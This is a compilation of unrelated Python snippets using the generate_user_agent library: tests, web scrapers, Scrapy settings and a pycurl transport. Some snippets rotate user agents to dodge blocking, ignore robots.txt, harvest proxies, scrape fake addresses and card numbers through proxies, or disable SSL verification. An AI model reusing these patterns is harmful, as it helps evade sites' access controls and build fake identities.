def test_navigator_option(self):
    for x in range(100):
        ua = generate_user_agent(navigator='firefox')
        self.assertTrue('firefox' in ua.lower())
        ua = generate_user_agent(navigator='chrome')
        self.assertTrue('chrome' in ua.lower())
def test_platform_option_tuple(self):
    for x in range(100):
        ua = generate_user_agent(platform=('win', 'linux'))
        ua = generate_user_agent(platform=('win', 'linux', 'mac'))
        ua = generate_user_agent(platform=('win',))
        ua = generate_user_agent(platform=('linux',))
        ua = generate_user_agent(platform=('mac',))
def test_device_type_smartphone_chrome():
    for _ in range(50):
        agent = generate_user_agent(device_type='smartphone', navigator='chrome')
        assert 'Mobile' in agent
        agent = generate_user_agent(device_type='tablet', navigator='chrome')
        assert 'Mobile' not in agent
def test_platform_option_tuple():
    for _ in range(50):
        generate_user_agent(os=('win', 'linux'))
        generate_user_agent(os=('win', 'linux', 'mac'))
        generate_user_agent(os=('win',))
        generate_user_agent(os=('linux',))
        generate_user_agent(os=('mac',))
def test_platform_navigator_option(self):
    for x in range(100):
        ua = generate_user_agent(platform='win', navigator='firefox')
        self.assertTrue('firefox' in ua.lower())
        self.assertTrue('windows' in ua.lower())
        ua = generate_user_agent(platform='win', navigator='chrome')
        self.assertTrue('chrome' in ua.lower())
        self.assertTrue('windows' in ua.lower())
def test_platform_option():
    for _ in range(50):
        agent = generate_user_agent(os='linux')
        assert 'linux' in agent.lower()
        agent = generate_user_agent(os='win')
        assert 'windows' in agent.lower()
        agent = generate_user_agent(os='mac')
        assert 'mac' in agent.lower()
def test_navigator_option():
    for _ in range(50):
        agent = generate_user_agent(navigator='firefox')
        assert 'firefox' in agent.lower()
        agent = generate_user_agent(navigator='chrome')
        assert 'chrome' in agent.lower()
        agent = generate_user_agent(navigator='ie')
        assert 'msie' in agent.lower() or 'rv:11' in agent.lower()
def test_platform_option(self):
    for x in range(100):
        ua = generate_user_agent(platform='linux')
        self.assertTrue('linux' in ua.lower())
        ua = generate_user_agent(platform='win')
        self.assertTrue('windows' in ua.lower())
        ua = generate_user_agent(platform='mac')
        self.assertTrue('mac' in ua.lower())
    self.assertRaises(UserAgentRuntimeError,
                      generate_user_agent,
                      platform=11)
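The tests above exercise the library's keyword options; note that the snippets in this collection use both the older platform= spelling and the newer os= spelling for the same option. A minimal usage sketch combining keywords that appear in these tests (the particular values are only examples):

from user_agent import generate_user_agent

# Random desktop user agent restricted to Windows/Linux and Chrome/Firefox.
ua = generate_user_agent(os=('win', 'linux'),
                         navigator=('chrome', 'firefox'),
                         device_type='desktop')
print(ua)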
def getarticle(readfile):
    ''' get the article and save it in a different file '''
    try:
        fileopen = open(readfile)
    except IOError:
        print "file " + readfile + " not in the location specified"
        return
    i = 1
    for line in fileopen:
        try:
            ua = generate_user_agent()
            head = ua.encode('ascii', 'ignore')
            headers = {'User-Agent': head}  # header name must be 'User-Agent' to be honoured
            print "reading article :"
            print line
            html = requests.get(line, headers=headers).text
            tex = fulltext(html)
            writefile = "201604" + str(j) + "_" + str(i) + ".txt"  # j is expected to be defined at module level
            with io.open(writefile, encoding='utf-8', mode='w+') as ns:
                strng = ' '.join(tex.split())
                ns.write(strng)
            i = i + 1
        except:
            pass
def get_proxies(proxy_type, ip_set, start_page, end_page):
    """extract proxies from page source code, store them in redis

    Args:
        proxy_type (str): base url for proxy type, like the global variables CHINA and OTHER
        ip_set (str): which set the ips should be stored in within redis
        start_page (int): which page to start crawling
        end_page (int): which page to stop crawling
    """
    try:
        conn = get_connection()
    except Exception:
        print 'Error while connecting to redis'
        return
    proxies, curr_proxy = [], None
    for page in xrange(start_page, end_page + 1):
        if page % 2 == 0:
            time.sleep(20)
        # get page source code
        headers = {'user-agent': generate_user_agent(), 'referer': 'http://www.xicidaili.com/'}
        text = requests.get(proxy_type + str(page), headers=headers).text
        # extract ips from source code
        soup = BeautifulSoup(text, 'lxml')
        for tr in soup.find_all('tr')[1:]:
            tds = tr.find_all('td')
            # if u'美国' in tds[3].text:  # optional filter, disabled: keep only US proxies
            proxy = tds[1].text + ':' + tds[2].text
            if is_valid('https://www.amazon.com/', proxy):
                conn.sadd(ip_set, proxy)
                print '%s added to ip set %s' % (proxy, ip_set)
def getBaiduDictCate():
    """Get the categories of the Baidu dictionary library. There are three category levels;
    because the third level is too fine-grained and sparse, third-level categories are merged
    into their second-level parents.

    :return: two dicts; the first maps each top-level category ID to its name, the second
        records all sub-categories under each top-level category of the first dict.
    """
    bigCateDict = {}
    smallCateDict = {}
    initPageURL = r'https://shurufa.baidu.com/dict'
    cateBaseURL = r'https://shurufa.baidu.com/dict_list?cid='

    # avoid 502 errors
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # fetch the top-level categories
    try:
        request = urllib2.Request(url=initPageURL, headers=headers)
        response = urllib2.urlopen(request)
        data = response.read()
    except urllib2.HTTPError, e:
        print 'Error while getting the big category, error code:', e.code
        sys.exit()
def get_address(proxy):
    """fetch american address from https://fakena.me/random-real-address/

    Args:
        proxy (str): proxy to visit the target site, ip:port

    Returns:
        format_addr (str): american address in the form of "address_line # city # state # zip"
    """
    ignore_warnings()
    url = r'https://fakena.me/random-real-address/'
    referer = r'https://fakena.me'
    header = {'user-agent': generate_user_agent(), 'referer': referer}
    curr_proxy = {'http': 'http://%s' % proxy}
    text = requests.get(url, headers=header, proxies=curr_proxy).text

    pattern = re.compile('<strong>(.+)<br>(.+)</strong>')
    result = re.findall(pattern, text)
    if result:  # sometimes the result is empty
        print result[0][0], result[0][1]
        address_line = result[0][0]
        city, state_zip = result[0][1].split(',')
        state, zip = state_zip.split()
        format_addr = address_line + '#' + city + '#' + state + '#' + zip
        return format_addr
    else:
        return ''
def getheadline(companyName, day, firstlink, prevdatelink):
    ''' scrape headlines from finance.yahoo.com '''
    #date = '2016-02-'+str(day)
    searchUrl = 'http://finance.yahoo.com/q/h?s=' + companyName + '&t=2016-04-' + str(day)
    #use fake useragent
    #ua = generate_user_agent()
    head = generate_user_agent().encode('ascii', 'ignore')
    headers = {'User-Agent': head}  # header name must be 'User-Agent' to be honoured
    response = requests.get(searchUrl, headers=headers)
    soup = BeautifulSoup(response.content, 'html.parser')
    links = soup.select('div.yfi_quote_headline ul > li > a')
    #write the search results in file, a new file for each day
    filename = 'links' + str(day) + '.txt'
    with io.open(filename, encoding='utf-8', mode='w+') as ns:
        count = 1
        for link in links:
            nextlinks = link.get('href') + '\n'
            if count == 1:
                ns.write(nextlinks)
                firstlink = nextlinks
            elif prevdatelink == nextlinks:
                print "All unique headlines scraped"
                break
            else:
                ns.write(nextlinks)
            count += 1
    return firstlink
def getCategoryPages(caterotyID, downloadDIR):
    """Get the total number of pages for a category from its initial page, and put all
    page numbers into PAGE_QUEUE for the download threads.

    :param caterotyID: ID of the dictionary category to download, used to build the correct url
    :param downloadDIR: directory where the downloaded dictionaries are stored
    :return:
    """
    global CATEID, DOWNLOAD_DIR, PAGE_BASE_URL, THREAD_LOCK
    CATEID = caterotyID
    DOWNLOAD_DIR = downloadDIR
    PAGE_BASE_URL = 'https://shurufa.baidu.com/dict_list?cid=%s' % CATEID
    pagePattern = re.compile(r'page=(\d+)#page')  # regex matching the URLs of the other pages in the source

    # avoid 502 errors
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # find the largest page number; the pages are then 1..max
    # the server may return 502/500 errors, so retry up to maxTry times
    maxTry = 8
    data = None
    for i in xrange(maxTry):
        try:
            request = urllib2.Request(url=PAGE_BASE_URL, headers=headers)
            response = urllib2.urlopen(request)
            data = response.read()
            break
        except urllib2.HTTPError, e:
            if i == maxTry - 1:
                with io.open(DOWNLOAD_LOG.decode('utf8'), mode='a', encoding='utf8') as f:
                    f.write((str(e.code) + ' error while parsing url ' + PAGE_BASE_URL + '\n').decode('utf8'))
        except:
def on_blocked(self):
    ScholarConf.USER_AGENT = generate_user_agent()  # Randomize user agent
    self.timeout *= 2.0  # Increase timeout (exponential backoff)
    if self.blocked_cmd is not None:
        status, output = getstatusoutput(self.blocked_cmd)
        if status != 0:
            self.status.error(output)
def send_query(self, query):
    # TODO: Randomize query, i.e. remove/change unused arguments to vary query signature
    self.queries_sent += 1
    if self.queries_sent % self.queries_change == 0:
        self.queries_change = randint(3, 13)
        ScholarConf.USER_AGENT = generate_user_agent()
    return super(BibDLQuerier, self).send_query(query)
def invoke(self, url):
    headers = {'User-Agent': generate_user_agent()}
    req = requests.get(url, headers=headers)
    soup = BeautifulSoup(req.text, 'lxml')  # from_encoding="gb2312"
    books = soup.select("div.book_list > ul > li")
    for book in books:
        self.parse_book(book)
def get_request(url):
    """
    Takes in a url
    Returns the HTTP response for the page of users' posts
    """
    headers = {"User-Agent": generate_user_agent()}
    # headers must be passed as a keyword argument; a bare positional would be sent as query params
    response = requests.get(url, headers=headers)
    return response
def download_images(link_file_path, download_dir, log_dir): """download images whose links are in the link file Args: link_file_path (str): path of file containing links of images download_dir (str): directory to store the downloaded images Returns: None """ print('Start downloading with link file {0}..........'.format(link_file_path)) if not os.path.exists(log_dir): os.makedirs(log_dir) main_keyword = link_file_path.split('/')[-1] log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword) logging.basicConfig(level=logging.DEBUG, filename=log_file, filemode="a+", format="%(asctime)-15s %(levelname)-8s %(message)s") img_dir = download_dir + main_keyword + '/' count = 0 headers = {} if not os.path.exists(img_dir): os.makedirs(img_dir) # start to download images with open(link_file_path, 'r') as rf: for link in rf: try: o = urlparse(link) ref = o.scheme + '://' + o.hostname #ref = 'https://www.google.com' ua = generate_user_agent() headers['User-Agent'] = ua headers['referer'] = ref print('\n{0}\n{1}\n{2}'.format(link.strip(), ref, ua)) req = urllib.request.Request(link.strip(), headers = headers) response = urllib.request.urlopen(req) data = response.read() file_path = img_dir + '{0}.jpg'.format(count) with open(file_path,'wb') as wf: wf.write(data) print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count)) count += 1 if count % 10 == 0: print('Process-{0} is sleeping'.format(main_keyword)) time.sleep(5) except urllib.error.URLError as e: print('URLError') logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason)) continue except urllib.error.HTTPError as e: print('HTTPError') logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason)) continue except Exception as e: print('Unexpected Error') logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args)) continue
def download_with_time_limit(link_file_path, download_dir, log_dir, limit_time = 10): main_keyword = link_file_path.split('/')[-1] if not os.path.exists(log_dir): os.makedirs(log_dir) log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword) logging.basicConfig(level = logging.DEBUG, filename = log_file, filemode = "a+", format = "%(asctime)-15s %(levelname)-8s %(message)s") img_dir = download_dir + main_keyword + '/' count = 0 headers = {} if not os.path.exists(img_dir): os.makedirs(img_dir) signal.signal(signal.SIGALRM, handler) with open(link_file_path, 'r') as rf: for link in rf: try: ref = 'https://www.google.com' o = urlparse(link) ref = o.scheme + '://' + o.hostname ua = generate_user_agent() headers['User-Agent'] = ua headers['referer'] = ref # limit the time of downloading a image try: signal.alarm(limit_time) # set a timeout(alarm) req = urllib.request.Request(link.strip(), headers = headers) response = urllib.request.urlopen(req) data = response.read() except TimeLimitError as e: print('TimeLimitError: process-{0} encounters {1}'.format(main_keyword, e.value)) logging.error('TimeLimitError while downloading image{0}'.format(link)) continue finally: signal.alarm(0) # disable the alarm file_path = img_dir + '{0}.jpg'.format(count) with open(file_path,'wb') as wf: wf.write(data) print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count)) count += 1 if count % 10 == 0: print('Process-{0} is sleeping'.format(main_keyword)) time.sleep(5) except urllib.error.HTTPError as e: print('HTTPError') logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason)) continue except urllib.error.URLError as e: print('URLError') logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason)) continue except Exception as e: print('Unexpected Error') logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args)) continue
def download_images(main_keyword, supplemented_keywords, download_dir): """download images with one main keyword and multiple supplemented keywords Args: main_keyword (str): main keyword supplemented_keywords (list[str]): list of supplemented keywords Returns: None """ image_links = set() print('Process {0} Main keyword: {1}'.format(os.getpid(), main_keyword)) # create a directory for a main keyword img_dir = download_dir + main_keyword + '/' if not os.path.exists(img_dir): os.makedirs(img_dir) for j in range(len(supplemented_keywords)): print('Process {0} supplemented keyword: {1}'.format(os.getpid(), supplemented_keywords[j])) search_query = (main_keyword + ' ' + supplemented_keywords[j]).replace(' ','%20') # url = 'https://www.google.com/search?q=' + search_query + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg' url = 'https://www.google.com/search?q=' + search_query + '&source=lnms&tbm=isch' image_links = image_links.union(parse_page(url)) print('Process {0} get {1} links so far'.format(os.getpid(), len(image_links))) time.sleep(2) print ("Process {0} get totally {1} links".format(os.getpid(), len(image_links))) print ("Start downloading...") count = 1 for link in image_links: try: req = urllib.request.Request(link, headers = {"User-Agent": generate_user_agent()}) response = urllib.request.urlopen(req) data = response.read() file_path = img_dir + '{0}.jpg'.format(count) with open(file_path,'wb') as wf: wf.write(data) print('Process {0} fininsh image {1}/{2}.jpg'.format(os.getpid(), main_keyword, count)) count += 1 except urllib.error.URLError as e: logging.error('URLError while downloading image {0}\nreason:{1}'.format(link, e.reason)) continue except urllib.error.HTTPError as e: logging.error('HTTPError while downloading image {0}\nhttp code {1}, reason:{2}'.format(link, e.code, e.reason)) continue except Exception as e: logging.error('Unexpeted error while downloading image {0}\nerror type:{1}, args:{2}'.format(link, type(e), e.args)) continue print("Finish downloading, total {0} errors".format(len(image_links) - count))
def generate_profile(useragent="(default)"):
    profile = FirefoxProfile()
    if useragent.strip().lower() == "(default)":
        status("Using the default useragent")
        return profile
    elif useragent.strip().lower() == "(random)":
        random_useragent = generate_user_agent(os=('mac', 'linux'))
        profile.set_preference("general.useragent.override", random_useragent)  # make our useragent random
        status("Using random useragent " + random_useragent)
        return profile
    else:
        profile.set_preference("general.useragent.override", useragent)
        status("Using useragent " + useragent)
        return profile
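A hedged sketch of plugging the profile above into Selenium, mirroring the Firefox setup used elsewhere in these examples (the target URL is illustrative; firefox_profile is the classic Selenium keyword used in the other snippets here):

from selenium import webdriver

profile = generate_profile("(random)")          # generate_profile as defined above
driver = webdriver.Firefox(firefox_profile=profile)
driver.get("https://example.com")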
def test_invalid_platform_option():
    with pytest.raises(InvalidOption):
        generate_user_agent(os=11)
    with pytest.raises(InvalidOption):
        generate_user_agent(os='dos')
    with pytest.raises(InvalidOption):
        generate_user_agent(os='win,dos')
def get_phone_visa():
    """fetch phone, visa from http://www.fakeaddressgenerator.com/World/us_address_generator"""
    url = r'http://www.fakeaddressgenerator.com/World/us_address_generator'
    referer = r'http://www.fakeaddressgenerator.com/World'
    header = {'user-agent': generate_user_agent(), 'referer': referer}
    text = requests.get(url, headers=header).text
    soup = BeautifulSoup(text, 'lxml')
    info = soup.find_all('input')
    """
    print 'name:',info[0]['value']
    print 'phone:',info[9]['value']
    print 'visa:',info[11]['value']
    print 'expires:',info[13]['value']
    """
    name_phone = info[0]['value'] + '#' + info[9]['value']
    name_visa = info[0]['value'] + '#' + info[11]['value'] + '#' + info[13]['value']
    print name_phone, name_visa
    return name_phone, name_visa
def __init__(self, proxy):
    """init the webdriver by setting the proxy and user-agent

    Args:
        proxy (str): proxy in the form of ip:port
    """
    # set proxy
    ip, port = proxy.split(':')
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.http", ip)
    profile.set_preference("network.proxy.http_port", port)
    # set user_agent
    profile.set_preference("general.useragent.override", generate_user_agent())
    profile.update_preferences()
    self.driver = webdriver.Firefox(firefox_profile=profile)
    print 'current proxy: %s' % proxy
def download_page(url):
    """download raw content of the page

    Args:
        url (str): url of the page

    Returns:
        raw content of the page
    """
    try:
        headers = {}
        headers['User-Agent'] = generate_user_agent()
        headers['Referer'] = 'https://www.google.com'
        req = urllib.request.Request(url, headers=headers)
        resp = urllib.request.urlopen(req)
        return str(resp.read())
    except Exception as e:
        print('error while downloading page {0}'.format(url))
        logging.error('error while downloading page {0}'.format(url))
        return None
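A minimal usage sketch for download_page; the query URL simply mirrors the Google Images search URLs built in the neighbouring examples:

html = download_page('https://www.google.com/search?q=cat&source=lnms&tbm=isch')
if html is not None:
    print(len(html))   # length of the raw page source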
def is_valid(target_url, ip, referer):
    """judge if a proxy ip is valid for target_url

    Args:
        target_url (str): url that needs to be visited through a proxy
        ip (str): the proxy to test, in the form ip:port
        referer (str, optional): referer part of the headers of the request

    Returns:
        boolean
    """
    ignore_warnings()
    proxy = {'http': 'http://%s' % ip}
    headers = {'user-agent': generate_user_agent(), 'referer': referer}
    try:
        r = requests.get(target_url, headers=headers, proxies=proxy, timeout=6)
        return True
    except Exception:
        return False
def downloadSingleCate(cateID, dirName, downloadLog, tryBest=True):
    """Download the dictionaries of one category.

    :param cateID: category ID
    :param dirName: download directory
    :param downloadLog: download log that records the files that failed to download
    :param tryBest: whether to keep retrying up to the maximum number of attempts
    :return: None
    """
    pageBaseUrl = r'https://shurufa.baidu.com/dict_list?cid=%s' % cateID
    fileBaseUrl = r'https://shurufa.baidu.com/dict_innerid_download?innerid='
    pagePattern = re.compile(r'page=(\d+)#page')  # non-greedy match for URLs that jump to other pages
    filePattern = re.compile(r'dict-name="(.*?)" dict-innerid="(\d+)"')  # non-greedy match for the name and inner id of downloadable files
    visited = set()  # records whether a url has already been visited
    downloaded = set()  # records whether a file has already been downloaded

    # avoid 502 errors
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # find the largest page number; the pages are then 1..max
    try:
        request = urllib2.Request(url=pageBaseUrl, headers=headers)
        response = urllib2.urlopen(request)
        data = response.read()
    except urllib2.HTTPError, e:
        if tryBest:
            with io.open(downloadLog.decode('utf8'), mode='a', encoding='utf8') as f:
                f.write((str(e.code) + ' error while parsing url ' + pageBaseUrl + '\n').decode('utf8'))
        return False
def main(): page = 0 while True: page += 1 payload = { 'ss': 1, 'page': page, } user_agent = generate_user_agent() headers = { 'User-Agent': user_agent, } print(f'PAGE: {page}') response = requests.get(HOST + ROOT_PATH, params=payload, headers=headers) response.raise_for_status() random_sleep() html = response.text soup = BeautifulSoup(html, 'html.parser') class_ = 'card card-hover card-visited wordwrap job-link' cards = soup.find_all('div', class_=class_) if not cards: cards = soup.find_all('div', class_=class_ + ' js-hot-block') result = [] if not cards: break for card in cards: tag_a = card.find('h2').find('a') title = tag_a.text href = tag_a['href'] result.append([title, href]) vac_response = requests.get(HOST + href, headers=headers) vac_html = vac_response.text vac_soup = BeautifulSoup(vac_html, 'html.parser') workua_id = int(href.split('/')[-2]) vacancy = vac_soup.find('h1', id='h1-name').text address = vac_soup.find( 'p', class_='text-indent add-top-sm').text.strip() address = address.split('\n')[0] blocks = vac_soup.find_all( 'p', class_='text-indent text-muted add-top-sm') for block in blocks: if block.find('a') != None: company = block.find('a').find('b').text else: if block.find('b') != None: salary = block.find('b').text salary = salary.replace('\u202f', '') salary = salary.replace('\u2009', '') if not 'salary' in locals(): salary = None data = (workua_id, vacancy, company, address, salary) cur.execute('''INSERT INTO jobs VALUES (?, ?, ?, ?, ?)''', data) db.commit() save_info(result) db.close()
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     https://doc.scrapy.org/en/latest/topics/settings.html
#     https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#     https://doc.scrapy.org/en/latest/topics/spider-middleware.html

from user_agent import generate_user_agent

BOT_NAME = 'HeZhiNews'

SPIDER_MODULES = ['HeZhiNews.spiders']
NEWSPIDER_MODULE = 'HeZhiNews.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = generate_user_agent(os='win')

# Obey robots.txt rules
ROBOTSTXT_OBEY = False

# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 8

# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
CONCURRENT_REQUESTS_PER_DOMAIN = 8
CONCURRENT_REQUESTS_PER_IP = 8
def test_it(self):
    ua = generate_user_agent()
    self.assertTrue(len(ua) > 0)
def test_platform_linux(self):
    for x in range(100):
        ua = generate_user_agent(platform='linux')
        self.assertTrue(ua.startswith('Mozilla/5.0 (X11;'))
import re

import requests
from bs4 import BeautifulSoup
from user_agent import generate_user_agent

# Web scraping details
lastFmUrl = "https://www.last.fm"
topArtistsUrl = "/user/kaktusas86/library/artists?date_preset=ALL_TIME&page=1"

headers = {
    'User-Agent': generate_user_agent(device_type="desktop", os=('mac', 'linux'))
}


def fetchUrl(url, headers):
    response = requests.get(url, timeout=60, headers=headers)
    return BeautifulSoup(response.content, 'html.parser')


def fetchTopArtistsWithSoup():
    topArtistsSoup = fetchUrl(url=(lastFmUrl + topArtistsUrl), headers=headers)
    topArtistsHtml = topArtistsSoup.find(id="top-artists-section")
    # Loop through table rows reading basic info about each artist
    for artistInfo in topArtistsHtml.find_all('tr'):
        try:
            # Parse basic info: rank, title and scrobble count
            rank = artistInfo.find('td', class_="chartlist-index")
            rank = " ".join(rank.string.split())
            name = artistInfo.find('td', class_="chartlist-name")
            href = name.find('a', class_="link-block-target").get('href')
            name = " ".join(name.text.split())
            scrobbles = artistInfo.find('td', class_="chartlist-countbar")
def __init__(self, base_url):
    super().__init__(base_url)
    self.headers = {
        "User-Agent": generate_user_agent(device_type="desktop", os=("mac", "linux"))
    }
@file: jianshu.py
@time: 01/03/2018 20:44
"""
import requests
from bs4 import BeautifulSoup

from core import config, logger, db
from entities import Article
import user_agent

headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Accept': 'text/html, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent.generate_user_agent(),
    'Accept-Encoding': 'gzip, deflate, sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8,ja;q=0.6'
}


class Config(object):
    def __init__(self, cfg: dict):
        self.seminars = cfg['seminars']
        self.limit = cfg['limit']
        self.debug = cfg['debug'] if 'debug' in cfg else True


class Jianshu:
    _seminar_url = 'https://www.jianshu.com/c/%s?order_by=added_at&page=%d'
    _jianshu = 'https://www.jianshu.com'
def page_scraper(links): print('Cruises Pages scrap process...') result = [] for url in links: try: user_agent_ = { 'User-Agent': generate_user_agent(device_type='desktop', os=('mac', 'linux')) } print('scrap url page ...' + url[-30:-1] + 'l') dict_result = {} ask = requests.get(url, headers=user_agent_) soup = BSoup(ask.content, 'html.parser') #Получение имени name = soup.find('div', class_='col-md-9 river-site-highlight').find( 'h1').get_text().split('\n')[0] dict_result.update({'name': name}) #Получение количества дней soup_iter = soup.find( 'div', class_='panel-group accordion route').find_all( 'div', class_='panel panel-default') count_days = len(soup_iter) #Получение маршрутов itineary = [ soup_item.find('span', class_="route-city").text.replace( ' ', '').replace('\n', '') for soup_item in soup_iter ] dict_result.update({'itineary': itineary}) #Получение списка с датой отправки, кораблем, ценой soup_dayprice_iter = soup.find( 'div', class_='panel-group accordion price accordeon-data-price' ).find_all('div', class_='panel panel-default accordeon-panel-default') temp_list = [] for soup_item in soup_dayprice_iter: tag_a = soup_item.find('a', class_='collapsed panel-title') date_ = tag_a.find('div', class_='price-date').find( 'span', class_='price-duration').get_text() ship_ = tag_a.find( 'div', class_='price-ship').find('span').get_text() price_ = tag_a.find('div', class_='price-ship').find( 'div', class_='pull-right').find( 'span', class_='big-table-font').text.replace(' ', '').replace( '\n', '').replace('€', '').replace('.', '') temp_list.append( {date_converter(date_): { 'ship': ship_, 'price': price_ }}) dict_result.update({'days': temp_list}) result.append(dict_result) except: print('Page ' + url[-30:-1] + 'l' + 'Not load') write_in_file(result)
def main(platform, navigator, **kwargs):
    for x in range(30):
        print(generate_user_agent(platform=platform, navigator=navigator))
def __init__(self):
    headers = {}
    headers['User-Agent'] = generate_user_agent()
    self.session = Session()
    self.session.headers = headers
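Assuming the __init__ above belongs to a small HTTP client class (the class name below is hypothetical), usage would look roughly like this:

client = ApiClient()  # hypothetical class containing the __init__ above
resp = client.session.get('https://example.com')
print(resp.request.headers['User-Agent'])  # the generated UA is sent with every request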
class StatsZbHgjdSpider(scrapy.Spider): name = 'StatsZbHgjdSpider' allowed_domains = ['data.stats.gov.cn'] start_urls = ['http://data.stats.gov.cn/easyquery.htm?cn=C01'] DOWNLOAD_DELAY =20 get_tree_url = 'http://data.stats.gov.cn/easyquery.htm' root_zb = ['A01', 'A02', 'A03', 'A04', 'A05', 'A06'] # root_zb = ['A01'] root_param ={"dbcode":"hgjd","wdcode":"zb","m":"getTree"} user_agent = generate_user_agent() headers = { 'Accept': 'text/plain, */*; q=0.01', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'keep-alive', # 'Content-Length': '38', 'Content-Type': 'application/x-www-form-urlencoded', # 'Cookie': 'JSESSIONID=F57026E9795D5E42B04115AB1FC3F258; u=1; wzws_cid=7043b0f11490d1af13890c46dab3c77ff11815b0d6ed6e0bb208fba85822ed47ea9b8783a325b98ef76e90cfe4933255c2f6c6ab8c95edff8fd3105126e023a7', 'Host': 'data.stats.gov.cn', 'Origin': 'http://data.stats.gov.cn', 'Referer': 'http://data.stats.gov.cn/easyquery.htm', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36', 'X-Requested-With': 'XMLHttpRequest'} headers["User-Agent"]=user_agent def parse(self, response): for id in self.root_zb: self.root_param["id"] = id yield scrapy.FormRequest(url=(self.get_tree_url+"?"+urllib.parse.urlencode(self.root_param)),method='POST',headers=self.headers,callback=self.parse_content,dont_filter=True) # yield scrapy.FormRequest(url=self.get_tree_url, method='POST', # headers=self.headers,callback=self.parse_content,dont_filter=True) def parse_content(self, response): try: time.sleep(1) if 200 != response.status: print("res status not 200!") # print(str(response.body,"utf-8")) son_zb_arr = json.loads(str(response.body,"utf-8")) for key in son_zb_arr: # item = StatsZbSpiderItem() # item['dbcode'] = key['dbcode'] # item['id'] = key['id'] # item['isParent'] = key['isParent'] # item['name'] = key['name'] # item['pid'] = key['pid'] # item['wdcode'] = key['wdcode'] # print(key) if key['isParent']: self.root_param["id"] = key["id"] yield scrapy.FormRequest(url=(self.get_tree_url + "?" + urllib.parse.urlencode(self.root_param)), method='POST', headers=self.headers, callback=self.parse_content, dont_filter=True) yield key except BaseException: print('')
def process_config(self, grab): """ Setup curl instance with values from ``self.config``. """ # Copy some config for future usage self.config_nobody = grab.config["nobody"] self.config_body_maxsize = grab.config["body_maxsize"] try: request_url = normalize_url(grab.config["url"]) except Exception as ex: raise error.GrabInvalidUrl(u"%s: %s" % (six.text_type(ex), grab.config["url"])) # py3 hack if not six.PY3: request_url = make_str(request_url) self.curl.setopt(pycurl.URL, request_url) # Actually, FOLLOWLOCATION should always be 0 # because redirect logic takes place in Grab.request method # BUT in Grab.Spider this method is not invoked # So, in Grab.Spider we still rely on Grab internal ability # to follow 30X Locations self.curl.setopt(pycurl.FOLLOWLOCATION, 1 if grab.config["follow_location"] else 0) self.curl.setopt(pycurl.MAXREDIRS, grab.config["redirect_limit"]) self.curl.setopt(pycurl.CONNECTTIMEOUT, grab.config["connect_timeout"]) self.curl.setopt(pycurl.TIMEOUT, grab.config["timeout"]) self.curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4) # self.curl.setopt(pycurl.DNS_CACHE_TIMEOUT, 0) if not grab.config["connection_reuse"]: self.curl.setopt(pycurl.FRESH_CONNECT, 1) self.curl.setopt(pycurl.FORBID_REUSE, 1) self.curl.setopt(pycurl.NOSIGNAL, 1) self.curl.setopt(pycurl.HEADERFUNCTION, self.header_processor) if grab.config["body_inmemory"]: self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor) else: if not grab.config["body_storage_dir"]: raise error.GrabMisuseError("Option body_storage_dir is not defined") self.setup_body_file( grab.config["body_storage_dir"], grab.config["body_storage_filename"], create_dir=grab.config["body_storage_create_dir"], ) self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor) if grab.config["verbose_logging"]: self.verbose_logging = True # User-Agent if grab.config["user_agent"] is None: if grab.config["user_agent_file"] is not None: with open(grab.config["user_agent_file"]) as inf: lines = inf.read().splitlines() grab.config["user_agent"] = random.choice(lines) else: grab.config["user_agent"] = generate_user_agent() # If value is None then set empty string # None is not acceptable because in such case # pycurl will set its default user agent "PycURL/x.xx.x" if not grab.config["user_agent"]: grab.config["user_agent"] = "" self.curl.setopt(pycurl.USERAGENT, grab.config["user_agent"]) if grab.config["debug"]: self.curl.setopt(pycurl.VERBOSE, 1) self.curl.setopt(pycurl.DEBUGFUNCTION, self.debug_processor) # Ignore SSL errors self.curl.setopt(pycurl.SSL_VERIFYPEER, 0) self.curl.setopt(pycurl.SSL_VERIFYHOST, 0) # Disabled to avoid SSL3_READ_BYTES:sslv3 alert handshake failure error # self.curl.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) if grab.request_method in ("POST", "PUT"): if grab.config["post"] is None and grab.config["multipart_post"] is 